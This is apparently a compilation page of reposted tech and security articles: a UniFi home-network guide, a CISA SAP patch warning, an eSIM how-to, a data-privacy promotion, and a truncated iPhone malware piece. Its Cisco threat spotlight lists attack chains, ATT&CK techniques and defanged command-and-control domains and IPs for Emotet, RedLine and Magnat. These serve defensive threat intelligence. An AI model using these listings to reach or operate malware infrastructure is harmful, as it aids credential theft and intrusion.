Blog

How to set up the ultimate Ubiquiti UniFi home network in 2022

If you’re in the market for a new Wi-Fi 6 router, the best deliver reliable coverage to all corners of your home at little cost to get started. If you need extensibility, mesh routers allow you to add additional nodes. But if you want extensive configuration options and an all-in-one solution to cover routing, switching, and home security, consider Ubiquiti’s portfolio. Its UniFi brand covers switches and routers aimed at small businesses, but it turned its attention to the consumer category over the last two years with a decent selection of products. Ubiquiti offers a range of security cameras and video doorbells under UniFi Protect, can easily integrate into an UniFi network. The best part about Ubiquiti’s home security products is they record footage locally and don’t send data to a cloud service, providing better privacy without paying a monthly license to access all the security camera and video doorbell features. So if you’re looking to overhaul your home network, here’s what Ubiquiti has to offer.

All-in-one solution: UniFi Dream Router

Ubiquiti UniFi Dream Machine reviewSource: Harish Jonnalagadda / Android Central

If you don’t want to get a standalone wired router, switch over and add wireless access points, then you’ll want to take a look at Ubiquiti’s unified solutions. The latest offering is the UniFi Dream Router, and it goes up against the best Wi-Fi 6 routers. It’s the second all-in-one device in the UniFi range — after the Wi-Fi 5-based UniFi Dream Machine — and the feature-set you get here is astounding when you consider what it costs.

But first, a rundown of the hardware: the Dream Router has a cylindrical design similar to the Dream Machine, but a tiny screen at the front shows real-time network statistics. The router has 4×4 MIMO and goes up to 2.4Gbps with Wi-Fi 6, and it utilizes 160MHz channels. There’s a dual-core CPU, 128GB of storage, an SD card slot, 2GB of RAM, and four Ethernet ports with two offering PoE.

Because it is an UniFi product, the Dream Router has an exhaustive set of configuration options that far exceed most consumer routers. For example, it lets you connect and manage Ubiquiti’s security cameras and video doorbells. It is relatively straightforward to set up from your phone, and if you don’t want to tweak every setting, that’s fine. The options are there should you need them.

Now, there are a few caveats. First, the Dream Router is still in testing and isn’t finalized, and as such, you can only buy it from Ubiquiti’s Early Access store. You’ll have to make a free account to access the store, and while it’s sold out, it’s being restocked regularly. The Dream Router sells out periodically because of its price: $79.

For under $100, there isn’t another router that delivers anywhere close to the same set of features as the Dream Router, and with the router estimated to debut for a lot more once it hits the regular sales channel, now is the best time to pick it up.

UniFi Dream Router

With 4×4 MIMO and 2.4Gbps bandwidth over Wi-Fi 6, four Gigabit Ethernet ports with two PoE ports, and a screen at the front for monitoring real-time traffic, the Dream Router is the ultimate value.

Routing: UniFi Dream Machine Pro

Ubiquiti UniFi Dream Machine Pro reviewSource: Harish Jonnalagadda / Android Central

If you want to use a standalone router for managing your home network, you should take a look at the UniFi Dream Machine Pro (UDM Pro). I switched to the UDM Pro last year, and it has been a revelation. However, unlike the Dream Machine or Dream Router, the UDM Pro is a 1U rack-mounted solution, so you will need a rack server if you want to go down this route.

The UDM Pro is designed to be a wired router, so you’ll have to buy a switch and a wireless AP to connect your wireless devices like phones, tablets, and notebooks. Now, the standout feature with the UDM Pro is that it has a 3.5-inch HDD slot to facilitate network video recording (NVR), so if you want to add Ubiquiti’s security cameras to your network, this is the ideal way to go. In addition, you can slot in a 4TB drive in the UDM Pro and access locally-stored recordings going back weeks and months.

As for hardware, the UDM Pro has a built-in switch with eight Gigabit ports with a 1GbE backplane, 10Gbps SFP+ ports, and a quad-core CPU with Cortex-A57 cores. It includes the full suite of UniFi OS applications, including UniFi Network for switching, UniFi Protect for security cameras, UniFi Talk for VoIP, and UniFi Access for managing door access in a small office environment. The UDM Pro also offers intrusion detection and prevention features that block access to malicious websites.

Having used the UDM Pro extensively for the last year, the only downside I can think of is that it lacks built-in PoE ports. So when you’re connecting Ubiquiti’s wireless access points, you will need to buy an additional PoE injector.

UniFi Dream Machine Pro

The UDM Pro sits at the heart of a prosumer UniFi install. The rack-mounted router comes with an 8-port switch and 10G SFP+ ports, a 3.5-inch drive tray to use as a network video recorder, and class-leading threat management features.

Switching: UniFi Switch 24 PoE

Ubiquiti UniFi Dream Machine Pro reviewSource: Harish Jonnalagadda / Android Central

While I have over 30 devices connected to the wireless access points in my home at any given time, I use wired connectivity for the devices that I use the most, including the work machines, TVs, and the PS5. So while the UDM Pro has an eight-port switch, I find that a 24-port option is the best way to go, particularly if you’re going to connect a lot of security cameras. For context, I’m currently using over a dozen ports on my Switch Pro 24 PoE.

As for the switch, the Switch Pro 24 PoE is a fantastic choice, but at $699, it is also very costly. My recommendation would be the standard Switch 24 PoE; it is a 24-port switch with 16 Gigabit PoE+ ports with a total power budget of 95W alongside eight Gigabit ports. Like the UDM Pro, it is a 1U rack-mountable solution, and you get a small screen on the left for viewing real-time statistics.

The 95W power budget is more than adequate for the wireless access points and security cameras, and at $379, the Switch 24 PoE costs nearly half as much as the Pro version, and while you miss out on 10Gbps SFP+ ports, it has most of the essentials covered. If you don’t want a rack-mounted solution, you should look at the Switch Lite 16 PoE, a 16-port switch with eight PoE+ ports.

UniFi Switch 24 PoE

If you need more ports for wired connections, the Switch 24 PoE is the ideal option. It has 16 802.3at PoE ports with a cumulative power budget of 95W and can easily accommodate a slate of wireless access points and security cameras.

Wireless: UniFi Access Point Wi-Fi 6 Lite

UniFi Access Point Wi-Fi 6Source: Ubiquiti

With a wired router and switch sorted out, you’ll need a wireless access point so wireless devices like phones and tablets can connect to your home network. Ubiquiti has three options in this area: Wi-Fi 6 Lite, 6 Pro, and 6 Long Range. As the name suggests, all three are based on Wi-Fi 6, and they share a similar design.

These APs work best when mounted on the ceiling or the wall as the antennae are positioned sideways. The $99 Wi-Fi 6 Lite has 2×2 MIMO and goes up to 1.2Gbps on the 5GHz band, with a gain of 3dBi. The $149 Wi-Fi 6 Pro and $179 Wi-Fi 6 Long Range have IP54 ratings, draw power using the 802.3at PoE+ standard, and are designed for indoor and outdoor use.

The Wi-Fi 6 Pro is the newer offering and comes with higher-gain antennae that go up to 6dBi, with maximum 5GHz throughput of 4.8Gbps, with the Long Range going up to 5.5dBi and 2.4Gbps over 5GHz. The Wi-Fi 6 Pro also is the only access point in Ubiquiti’s portfolio that offers the 160MHz channel.

I use a Wi-Fi 6 Long Range and Wi-Fi 6 Lite in my home, but if you’re starting from scratch, a good bet would be to get a Wi-Fi 6 Lite and Wi-Fi 6 Pro to get going and add more as needed. These access points seamlessly integrate into the UniFi network and can be configured with the UDM Pro.

UniFi Access Point Wi-Fi 6 Lite

The Wi-Fi 6 Lite access point has 2×2 MIMO and 1.2Gbps throughput over 5GHz, and it does a good job delivering reliable Wi-Fi 6 signal to all corners of your home.

UniFi Access Point Wi-Fi 6 Pro

Ubiquiti’s latest wireless access point has it all: 160MHz channels over Wi-Fi 6, 4×4 MIMO with a 4.8Gbps throughput at 5GHz, and the ability to connect to up to 300 clients.

Security camera and doorbell: G4 series

UniFi Protect seriesSource: Ubiquiti

Security cameras are a big part of the UniFi Protect portfolio, and Ubiquiti offers a dozen products in this area. I use a combination of the G3 Flex, G4 Bullet, and the G4 Dome inside (and outside) my home, and they’re pretty good at what they do. Ubiquiti’s cameras draw power over PoE and let you record 1080p footage, plus you get weather resistance with the G4 series.

In my use case, I found the G3 Flex to be ideal as an indoor camera as it can be positioned just about anywhere inside the house, with the G4 Bullet and G4 Dome suited for outdoor use. The G3 Flex starts at $79, and you can pick up a pack of three for $229

The G4 Bullet offers 1440p recording that sells for $199, and if you want 4K video, 3x zoom lens, and IP67, you will need to get the $449 G4 Pro. Several users had issues with condensation on the G4 Bullet last year, but that hasn’t been a drawback for me. I haven’t used Ubiquiti’s doorbells just yet. Still, the G4 Doorbell offers a similar set of features as other smart video doorbells, including two-way audio, motion detection, and Wi-Fi connectivity. Here’s a breakdown of the feature-set that each security camera offers:

UniFi Protect seriesSource: Ubiquiti

You can pair the security cameras and doorbells to any UniFi routing solution with UniFi Protect. As for managing the security devices, you can install the UniFi Protect app on your phone and configure motion detection areas, privacy zones where the cameras won’t record footage, and smart detection for faces and vehicles.

You get a decent number of options for notifications, including the ability to set custom schedules and receive information at a set time. The cameras do a good job with motion detection and notification alerts, and UniFi Protect has a good UI that lets you view events and see recorded footage with ease. The best part is that all footage is stored locally, so you don’t have to pay a license fee to access all the features on offer. Unfortunately, there’s no active monitoring like you get with Arlo or Ring, but UniFi Protect gets a lot right for a self-hosted solution.

UniFi Camera G3 Flex

The G3 Flex is a great indoor camera, thanks to its versatile design. You get 1080p video recording, integrated IR LEDs for motion detection at night, and a built-in mic.

UniFi Camera G4 Bullet

The G4 Bullet has 1440p recording, a weather-sealed design, a built-in mic, a 110-degree angle of view, and LEDs for recording at night.

Building your UniFi network

Ubiquiti UniFi Dream Machine Pro reviewSource: Harish Jonnalagadda / Android Central

Ubiquiti has significantly expanded its consumer offerings in the last two years, and if you’re interested in getting started with an UniFi home network, you have a lot of choices. The UDM Pro is ideally suited as a routing solution because of the hardware on offer and the extensive feature-set and configuration. You can pair it with a multitude of switches and wireless access points.

The reason why I switched to UniFi was the extensibility. I started with the UDM Pro, Switch Pro 24 PoE, and the Wi-Fi 6 Long Range and Wi-Fi 6 Lite for wireless access. As for security cameras, I have three units of the G3 Flex for indoor use and a G4 Bullet located outside.

I’m now eyeing the Wi-Fi 6 Pro for the balcony as that’s the one area where I don’t get adequate coverage, and the G4 Doorbell as the video doorbell. I’ve deliberated getting a Nest Doorbell, but considering I have an UniFi Protect system set up anyway, I figured the G4 Doorbell would be a better alternative.

The biggest issue with Ubiquiti products is availability. The security cameras, in particular, are constantly sold out, so you will have to wait for a restock to get your hands on the G4 Bullet or even the Dream Router. Then you’ll need to factor in cabling as most of these devices connect over Ethernet. I’m fortunate that my home has internal Cat5 cabling, but you will need to consider that if you’re looking to make the switch.

The sheer amount of features in UniFi Network, the ease-of-use of UniFi Protect, and the fact that you have complete control over the recorded footage make Ubiquiti’s products an excellent choice for prosumers. Of course, building out the entire network is a sizeable investment if you’re picking up a UDM Pro, Switch 24 PoE, two APs, and a few security cameras, but at the end of the day, you get a scalable network that will serve you well for several years.

Source :
https://www.androidcentral.com/how-set-ultimate-ubiquiti-unifi-home-network-2022

CISA warns admins to patch maximum severity SAP vulnerability

The US Cybersecurity and Infrastructure Security Agency (CISA) has warned admins to patch a set of severe security flaws dubbed ICMAD (Internet Communication Manager Advanced Desync) and impacting SAP business apps using Internet Communication Manager (ICM).

CISA added that failing to patch these vulnerabilities exposes organizations with vulnerable servers to data theft, financial fraud risks, disruptions of mission-critical business processes, ransomware attacks, and a halt of all operations.

ICMAD bugs affect most SAP products

Yesterday, Onapsis Research Labs who found and reported CVE-2022-22536, one of the three ICMAD bugs and the one rated as a maximum severity issue, also cautioned SAP customers to patch them immediately (the other two are tracked as CVE-2022-22532, and CVE-2022-22533).

The SAP Product Security Response Team (PSRT) worked with Onapsis to create security patches to address these vulnerabilities and released them on February 8, during this month’s Patch Tuesday.

If successfully exploited, the ICMAD bugs allow attackers to target SAP users, business information, and processes, and steal credentials, trigger denials of service, execute code remotely and, ultimately, fully compromise any unpatched SAP applications.

“The ICM is one of the most important components of an SAP NetWeaver application server: It is present in most SAP products and is a critical part of the overall SAP technology stack, connecting SAP applications with the Internet,” Onapsis explained.

“Malicious actors can easily leverage the most critical vulnerability (CVSSv3 10.0) in unprotected systems; the exploit is simple, requires no previous authentication, no preconditions are necessary, and the payload can be sent through HTTP(S), the most widely used network service to access SAP applications.”

No SAP customers breached using ICMAD exploits so far

SAP’s Director of Security Response Vic Chung said they’re currently not aware of any customers’ networks breached using exploits targeting these vulnerabilities and “strongly” advised all impacted organizations to immediately apply patches “as soon as possible.”

SAP customers can use this open-source tool developed by Onapsis security researchers to help scan systems for ICMAD vulnerabilities.

The German business software developer also patched other maximum severity vulnerabilities associated with the Apache Log4j 2 component used in SAP Commerce, SAP Data Intelligence 3 (on-premise), SAP Dynamic Authorization Management, Internet of Things Edge Platform, SAP Customer Checkout.

All of them allow remote threat actors to execute code on systems running unpatched software following successful exploitation.

Source :
https://www.bleepingcomputer.com/news/security/cisa-warns-admins-to-patch-maximum-severity-sap-vulnerability/

Use an eSIM to get a cellular data connection on your Windows PC

Windows 10 and Windows 11
An eSIM lets you connect to the Internet over a cellular data connection. With an eSIM, you don’t need to get a SIM card from your mobile operator, and you can quickly switch between mobile operators and data plans.

For example, you might have one cellular data plan for work, and a different plan with another mobile operator for personal use. If you travel, you can get connected in more places by finding mobile operators with plans in that area.

Here’s what you’ll need:

  • A PC running Windows 10, Version 1703 or later. To see which version of Windows 10 your device uses, select the Start  button, then select Settings  > System  > About .
  • A PC with an eSIM in it. Here’s how you can tell if your PC has an eSIM:
    1. Select the Start  button, then select Settings  > Network & Internet  > Cellular .
    2. On the Cellular screen, look for a link near the bottom of the page that says Manage eSIM profiles. If that link appears, your PC has an eSIM.

      Manage eSIM profiles

Note: Some devices have both an eSIM and physical SIM card. If you don’t see Manage eSIM profiles but you do see Use this SIM for cellular data at the top of the Cellular settings screen, select the other SIM from the drop-down box, and then see if the Manage eSIM profiles link appears.

To add an eSIM profile

You’ll need to add an eSIM profile to get an Internet connection using cellular data.

If you have a PC from your organization, an eSIM profile might already be added to your PC. If you select Manage eSIM profiles and see an eSIM profile for a mobile operator you expect to find, you can skip this procedure and go to the next one to get connected.

  1. Select the Start  button, then select Settings  > Network & Internet  > Cellular Manage eSIM profiles.
  2. Under eSIM profiles, select Add a new profile.
  3. To search for available profiles or use an activation code you have from your mobile operator, do one of the following:
    • Search for available profiles
      1. Select Search for available profiles > Next.
      2. When a profile you want to use is found, select Download.
      3. Enter the confirmation code from your mobile operator in the corresponding box, then select Download.
      4. After the profile is downloaded and installed, select Continue to find other profiles you might want and then repeat the previous steps.
      5. Select Close when you have downloaded the profiles you want.
    • Use an activation code you have from your mobile operator
      1. Select Let me enter an activation code I have from my mobile operator > Next.
      2. If you have a QR code to scan for the activation code, choose which camera to use on your PC, and then scan the QR code.
      3. The activation code should appear in the corresponding Activation code box. Select Next.
      4. For the dialog box that asks Do you want to download this profile?, enter the confirmation code from your mobile operator into the corresponding box, and then select Download.
      5. Select Close.
  4. Optional: To give the profile a friendly name (for example, Work or Personal) to help you remember it, select the profile, select Edit name, type a name you’ll remember, and then select Save.

To connect to cellular data using an eSIM profile

  1. Select the Start  button, then select Settings  > Network & Internet  > Cellular  > Manage eSIM profiles.
  2. Under eSIM profiles, select the profile you want, and then select Use.
  3. Select Yes for This will use cellular data from your data plan and may incur charges. Do you want to continue?
    You’ll be connected to a cellular data network and ready to go.

To switch between profiles

If you have more than one profile installed on your PC, you can switch between profiles to use a different mobile operator and data plan.

  1. Select the Start  button, then select Settings  > Network & Internet  > Cellular  > Manage eSIM profiles.
  2. Under eSIM profiles, select the profile you want to stop using, and then select Stop using.
  3. Select Yes for You’ll be disconnected from this cellular network. Continue?
  4. Select the different profile you want to use, then select Use.

To delete a profile

If you don’t want to use a profile anymore, you can delete it from your PC. If you delete the profile and want to add it again later, you’ll need to download the profile again and might need to contact your mobile operator.

  1. Select the Start  button, then select Settings  > Network & Internet  > Cellular  > Manage eSIM profiles.
  2. Under eSIM profiles, select the profile to delete, and then select Delete.
  3. At the prompt that warns you that the profile will be permanently deleted, select Yes.

Note: If you have a PC from your organization, you might not be able to delete an eSIM profile because of a policy that’s set by your organization.

Source :
https://support.microsoft.com/en-us/windows/use-an-esim-to-get-a-cellular-data-connection-on-your-windows-pc-0e255714-f8be-b9ef-9e84-f75b05ed98a3#WindowsVersion=Windows_10

Cybersecurity Threat Spotlight: Emotet, RedLine Stealer, and Magnat Backdoor

Security and IT teams may be fresh off their holiday breaks, but threat actors have kept busy over the last month. In this edition of the Cybersecurity Threat Spotlight, we’re highlighting the Trojans, loaders, information stealers, and backdoors that we’re seeing online.

Want to learn more about how Cisco Umbrella can defend your enterprise against these threats? Request a personalized demo today!

Threat Name: Emotet

Threat Type: Trojan/Loader

Attack Chain:

A graphic showing the attack chain for Emotet: Malspam to Weaponized Document/Archive to Malicious Macros to Emotet Loader to CobaltStrike to Conti Ransomware. The graphic indicates that Cisco Umbrella protects users against Weaponized Document/Archive, Emotet Loader, and Cobalt Strike.

Description: Emotet is a banking Trojan that was first detected in 2014. Emotet has evolved into a massive botnet that delivers large amounts of malspam with malicious document attachments that lead to the Emotet Trojan. The Trojan also functions as a dropper for second-stage payloads, including – but not limited to – TrickBot, Qakbot, and Ryuk. Emotet has can steal SMTP credentials and email content. The threat actors reply to legitimate conversations in a victim’s email account, injecting replies that include malicious attachments.

Emotet Spotlight: In November, security researchers observed the return of the Emotet loader, which had been inactive since January 2021 after a law enforcement takedown. Emotet is a loader botnet that uses a Loader-as-a-Service model. Emotet’s main advantage is its modular system, which enables a highly targeted approach based on the requirements of the delivered payload. Unfortunately, the botnet has historically been leveraged by adversaries conducting sophisticated ransomware attacks.

At this point, security researchers observe strong connections between Emotet and Conti Ransomware. This can indicate that two cybercriminal syndicates are or will be establishing a new partnership. Historically, Conti was known to rely on sustainable methods of operation. Emotet has proven to be able to provide initial access and a strong foothold in multiple corporate networks. This can become the new trend in adversaries, and it will likely have a major impact on the threat landscape in 2022.

Target Geolocations: Worldwide
Target Data: User Credentials, Browser Data, Sensitive Information
Target Businesses: Any
Exploits: N/A

Mitre ATT&CK for Emotet

Initial Access:
Phishing: Spearphishing Attachment or Spearphishing Link, Valid Accounts: Local Accounts
Discovery:
Account Discovery
Process Discovery
Persistence:
Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
Create or Modify System Process: Windows Service
Scheduled Task/Job: Scheduled Task
Execution:
Command and Scripting Interpreter: PowerShell, Windows Command Shell, Visual Basic
User Execution: Malicious Link, Malicious File
Windows Management Instrumentation
Evasion:
Obfuscated Files or Information
Software Packing
Collection:
Archive Collected Data
Email Collection: Local Email Collection
Credential Access:
Brute Force: Password Guessing
Credentials From Password Stores: Credentials from Web Browsers
Network Sniffing
OS Credential Dumping: LSASS Memory
Unsecured Credentials: Credentials In Files
Command and Control:
Encrypted Channel: Asymmetric Cryptography, Non-Standard Port
Exfiltration:
Exfiltration Over C2 Channel
Lateral Movement:
Exploitation of Remote Services
Remote Services: SMB/Windows Admin Shares
Privilege Escalation:
Process Injection: Dynamic-Link Library Injection

IOCs:

Domains (Active)

cars-taxonomy[.]mywebartist[.]eu
crownadvertising[.]ca
giadinhviet[.]com
hpoglobalconsulting[.]com
immoinvest[.]com[.]br
itomsystem[.]in
pasionportufuturo[.]pe
thetrendskill[.]com
visteme[.]mx
cursossemana[.]com
callswayroofco[.]com
dipingwang[.]com
yougandan[.]com

Domains (Historical)

adorwelding[.]zmotpro[.]com
alfadandoinc[.]com
alfaofarms[.]com
av-quiz[.]tk
ceshidizhi[.]xyz
ckfoods[.]netdevanture[.]com[.]sg
evgeniys[.]ru
goodtech[.]cetxlabs[.]com
html[.]gugame[.]net
huskysb[.]com
im2020[.]vip
jamaateislami[.]com
laptopinpakistan[.]com
linebot[.]gugame[.]net
lpj917[.]com
manak[.]edunetfoundation[.]org
newsmag[.]danielolayinkas[.]com
onlinemanager[.]site
parentingkiss[.]com
pibita[.]net
primtalent[.]com
protracologistics[.]com
ranvipclub[.]net
ridcyf[.]com
server[.]zmotpro[.]com
staviancjs[.]com
team[.]stagingapps[.]xyz
thepilatesstudionj[.]com
vcilimitado[.]com
vegandietary[.]com
voltaicplasma[.]com
www[.]168801[.]xyz
www[.]caboturnup[.]com
xanthelasmaremoval[.]com
yoho[.]love

IPs (Active)

151[.]80[.]142[.]33
87 [.] 248 [.] 77 [.] 159
159 [.] 65 [.] 76 [.] 245

IPs (Historical)

105[.]247[.]100[.]215
118[.]244[.]214[.]210
120[.]150[.]206[.]156
12[.]57[.]239[.]19
139[.]162[.]157[.]8
139[.]59[.]242[.]76
169[.]64[.]242[.]153
173[.]90[.]152[.]220
179[.]52[.]236[.]96
181[.]119[.]30[.]35
181[.]229[.]155[.]11
185[.]129[.]3[.]211
185[.]97[.]32[.]6
186[.]176[.]182[.]192
186[.]4[.]234[.]27
189[.]130[.]50[.]85
189[.]234[.]165[.]149
190[.]128[.]27[.]233
200[.]27[.]55[.]100
200[.]56[.]104[.]44
208[.]180[.]149[.]228
208[.]180[.]246[.]147
216[.]176[.]21[.]143
216[.]251[.]1[.]1
23[.]254[.]203[.]51
24[.]206[.]17[.]102
37[.]120[.]175[.]15
45[.]123[.]3[.]54
50[.]100[.]215[.]149
50[.]125[.]99[.]70
51[.]75[.]168[.]89
54[.]39[.]176[.]22
54[.]39[.]181[.]130
67[.]215[.]49[.]234
67[.]43[.]253[.]189
86[.]98[.]71[.]86
92[.]207[.]145[.]74
96[.]246[.]206[.]16

Additional Information:

Back from the dead: Emotet re-emerges, begins rebuilding to wrap up 2021
Corporate Loader “Emotet”: History of “X” Project Return for Ransomware

Which Cisco Products Can Block:

Cisco Secure Endpoint
Cisco Secure Email
Cisco Secure Firewall/Secure IPS
Cisco Secure Malware Analytics
Cisco Umbrella
Cisco Secure Web Appliance

Threat Name: RedLine Stealer

Threat Type: Information Stealer

Attack Chain:

A graphic showing the attack chain for RedLine Stealer: Malspam Link/Trojanized App Download to RedLine Malware to Information Stealing to Command and Control. The graphic indicates that Cisco Umbrella protects against Malspam Link/Trojanized App Download, RedLine Malware, and Command and Control.

Description: RedLine is an information stealer available as a Malware-as-a-Service (MaaS) on Russian underground forums. It steals information like login credentials, autocomplete fields, passwords, and credit card information from browsers. It also collects information about the user and their system, like the username, location, hardware configuration, and installed security software. Finally, a recent update to RedLine also adds the ability to stead cryptocurrency cold wallets. RedLine appears to be under active development, with frequent introductions of new features.

RedLine Spotlight: Security researchers discovered that most stolen credentials currently sold on the dark web underground markets had been collected using RedLine Stealer malware. RedLine Stealer attempts to harvest information from browsers – like passwords, cryptocurrency wallets, and VPN services – and system information – like hardware configuration and location. Over the past year, RedLine has been enhanced with the addition of new features. It is now capable of loading other malware software and running commands while periodically sending updates containing new information from the infected host to its C2. The main goal of cybercrime campaigns utilizing RedLine Stealer appears to be the sale of stolen data to other cybercriminals who weaponize it in their own attacks.

Target Geolocations: Any
Target Data: User Credentials, Browser Data, Financial and Personal Information, Cryptocurrency Wallets
Target Businesses: Any
Exploits: N/A

MITRE ATT&CK for RedLine

Initial Access:
Phishing
Trojanized Applications
Credential Access:
Credentials from Password Stores
Steal Web Session Cookie
Unsecured Credentials
Credentials from Password Stores: Credentials from Web Browsers
Discovery:
Account Discovery
Software Discovery
Process Discovery
System Time Discovery
System Service Discovery
System Location Discovery
Peripheral Device Discovery
Persistence:
Registry Run Keys/Startup Folder
Scheduled Task/Job: Scheduled Task
Execution:
User Execution
Command and Scripting Interpreter: PowerShell
Evasion:
Impair Defenses: Disable or Modify Tools
Collection:
Screen Capture
Command and Control:
Non-Standard Port
Non-Application Layer Protocol
Exfiltration:
Exfiltration Over C2 Channel

IOCs

Domains (Historical)

userauto[.]space
22231jssdszs[.]fun
hssubnsx[.]xyz
dshdh377dsj[.]fun

IPs (Active)

185[.]215[.]113[.]114

IPs (Historical)

37[.]0[.]8[.]88
193[].142[.]59[.]119
136[.]144[.]41[.]201

Additional Information

RedLine Stealer identified as primary source of stolen credentials on two dark web markets
Redline Stealer
Shining a Light on RedLine Stealer Malware and Identity Data Found in Criminal Shops

Which Cisco Products Can Block:
Cisco Secure Endpoint
Cisco Secure Email
Cisco Secure Firewall/Secure IPS
Cisco Secure Malware Analytics
Cisco Umbrella
Cisco Secure Web Appliance

Threat Name: Magnat Backdoor

Threat Type: BackDoor

Attack Chain:[1]

Graphic showing the attack chain for Magnat BackDoor: Malvertising to Download Fake Installer to Dee-Obfuscation to RDP Backdoor/Information Stealer/Chrome Extension Installer to Command and Control. The graphic indicates that Umbrella protects users against Malvertising, Download Fake Installer, RDP Backdoor/Information Stealer, and Command and Control

Description: Magnat BackDoor is an AutoIt-based installer that prepares a system for remote Microsoft Desktop Access and forwards the RDP service port on an outbound SSH tunnel. This installer’s actions pave the way for the attacker to access the system remotely via RDP. The malware applies this technique by setting up a scheduled task that periodically contacts a C2 server and sets up the tunnel if instructed by the C2 response.

Magnat BackDoor Spotlight: Cisco Talos recently observed a malicious campaign offering fake installers of popular software as bait to get users to execute the malware on their systems. This campaign includes a set of malware distribution campaigns that started in late 2018 and have targeted Canada, the U.S., Australia, and some European Union countries. Two undocumented malware families (a BackDoor and a Google Chrome extension) are consistently delivered together in these campaigns. An unknown actor with the alias “magnat” is likely the author of these new families and has consistently developed and improved them. The attacker’s motivations appear to be financial gain from selling stolen credentials, executing fraudulent transactions, and providing Remote Desktop Access to systems.

Target Geolocations: Canada, U.S., Australia, E.U. Countries
Target Data: Credentials, Sensitive Data
Target Businesses: Any

MITRE ATT&ACK for Magnat BackDoor

Initial Access:
Malvertising
Persistence:
Scheduled Task/Job
Execution:
Scheduled Task/Job
Evasion:
Impair Defenses: Disable or Modify System Firewall
Deobfuscate/Decode Files or Information
Command and Control:
Application Layer Protocol
Exfiltration:
Exfiltration Over Command and Control Channel

IOCs

Domains (Active)

chocolatepuma[.]casa
wormbrainteam[.]club
430lodsfb[.]xyz
softstatistic[.]xyz
happyheadshot[.]club
aaabasick[.]fun
nnyearhappy[.]club
teambrainworm[.]club
yanevinovat[.]club
fartoviypapamojetvse[.]club
hugecarspro[.]space
burstyourbubble[.]icu
boogieboom[.]host
cgi-lineup[.]website
newdawnera[.]fun
bhajhhsy6[.]site
iisnbnd7723hj[.]digital
sdcdsujnd555w[.]digital

Additional Information:

Magnat campaigns use malvertising to deliver information stealer, backdoor and malicious Chrome extension

Which Cisco Products Can Block:
Cisco Secure Endpoint
Cisco Secure Firewall/Secure IPS
Cisco Secure Malware Analytics
Cisco Umbrella

[1] While Cisco products can protect against RDP BackDoor and Information Stealer, they do not protect against Chrome Extension Installers

Source :
https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-emotet-redline-stealer-magnat-backdoor

Why You Need to Care About Data Privacy & 5 Tips for Better Data Security

The privacy of our data has always been important. However, because we’re sharing more of it than ever before, being aware of data privacy and taking the necessary steps to protect it has never been more crucial. In this article, in celebration of Data Privacy Week, we cover why data privacy is so important, what can happen if your data were to fall into the wrong hands, and what you can do to protect your personal data.

Find out if your email address appeared in any data leaks

What is data privacy and why is it important?

Data privacy often refers to the practice of handling sensitive data in line with regulatory requirements. In most developed countries, there are specific data privacy laws in place that regulate how companies can collect, store, and share customer data.

While the EU has a comprehensive data privacy law, the General Data Protection Regulation (GDPR), which covers all different types of data, only three US states currently have similar, all-encompassing data privacy laws (California, Virginia, and Colorado). Instead, the US has many different laws designed to target specific types of data. For example, the Fair Credit Reporting Act (FCRA) protects information in your credit report, and the Family Educational Rights and Privacy Act (FERPA) protects students’ education reports from being freely accessible.

However, because of how much time we spend online nowadays, we’re putting more of our personal data out there for others to see than ever before. As a result, it is not only important to understand how protected your data is when you share it with a company, but also how private it is when you share it online.

How to protect your data privacy

Here are some of our top tips for data privacy protection:

  1. Only give your data to trustworthy companies and websites — Perhaps you’ve come across a new online clothing store or seen an app on the app store that takes your fancy, but you’re unsure if you can trust the company. If you’ve never heard of the company before, it’s best to do some quick research to learn whether or not you can trust it with your data.
  2. Think twice before sharing — With social media being such a big part of our everyday lives, it’s easy to forget that what we post online, stays online forever. Always think twice before sharing something online. Don’t publicly share personal information such as your address, phone number, or social security number.
  3. Take advantage of privacy settings — On every website, app, and game that you use, make sure you’re taking advantage of the built-in privacy settings. By doing so, you’ll ensure that only people you know can view your information.
  4. Use strong passwords and enable 2FA — When you create an online account, you almost always need to share lots of personal data — your full name, email address, and date of birth, for example. Although this data isn’t publicly accessible, if a hacker were to gain access to one of your accounts, they would be able to see all this information. To avoid this happening, make sure to use only strong, tough-to-hack passwords and that all your accounts have two-factor authentication (2FA) enabled.
  5. Use a VPN on public Wi-Fi — Unprotected Wi-Fi networks are notoriously unsecure. Because no password is required to access them, nearby hackers can steal any data transferred over them. To protect yourself, always use a VPN on public Wi-Fi networks.

Data leaks in 2021 — T-Mobile, LinkedIn, Moncler & CoinMarketCap

The truth is, no matter how well a company abides by data privacy laws and how thoroughly it protects its customers’ data, it can never be 100% data leak-proof. In 2021 alone, a shocking number of companies suffered high-profile data leaks, including T-MobileLinkedInMoncler, and CoinMarketCap. Those leaks resulted in hundreds of millions of people having their sensitive personal data leaked, which is used by criminals to commit all sorts of crimes — with the most concerning of them all being identity theft.

According to the Federal Trade Commission, there were over 1 million reports of identity theft in 2021. Below are some of the things the FTC says criminals can do with your data:

  • Get new credit cards in your name.
  • Open a phone, electricity, or gas account in your name.
  • Steal your tax refund.
  • Get medical care under your name (and leave you with a huge bill!).
  • Pretend to be you if they get arrested.

Cybercriminals often put stolen data up for sale on underground forums on the regular internet, as well as the dark web. And as you can imagine, personal information that is particularly valuable to them can fetch a high price. On average, on the dark web, a driver’s license will go for $205, an ID card for $213, and a passport sells for a whopping $684!

How to stay protected from data leaks

You might be thinking that staying protected from data leaks is an impossible task, but the answer is easy: Trend Micro™ ID Security . Available for Android and iOS, Trend Micro™ ID Security can scan the internet and the dark web 24/7 for your personal information. If your data is leaked, the app notifies you immediately so you can take action to avoid people stealing your identity. If your information is out there, you’ll be the first to know!

Here are some of the features offered by Trend Micro™ ID Security :

  • Personal Data Protection Score — See exactly how safe your online personal data is with your customized Protection Score.
  • 24/7 Comprehensive Personal Data Monitoring — ID Security can scan the internet and the dark web for all your personal information including up to 5 email addresses and bank account numbers, 10 credit card numbers, your Social Security number, and lots more.
  • Social Media Account Protection — Strengthen the security of your social media accounts. Be instantly alerted if your Facebook or Twitter account’s data is leaked by cybercriminals.

To learn more about Trend Micro™ ID Security and claim your free 30-day trial, click the button below.Get ID Security

Source :
https://news.trendmicro.com/2022/01/27/why-you-need-to-care-about-data-privacy-5-tips-for-better-data-security/

How to Detect Malware on iPhone — 5 Steps

Have you noticed your iPhone behaving a little strangely recently? Maybe you’ve been bombarded by unusual ads or your battery has been hitting 0% much more quickly than normal. If you’ve got your suspicions that your iPhone has a malware infection, keep on reading to learn how to know for sure!

Step #1 — Check for high data usage

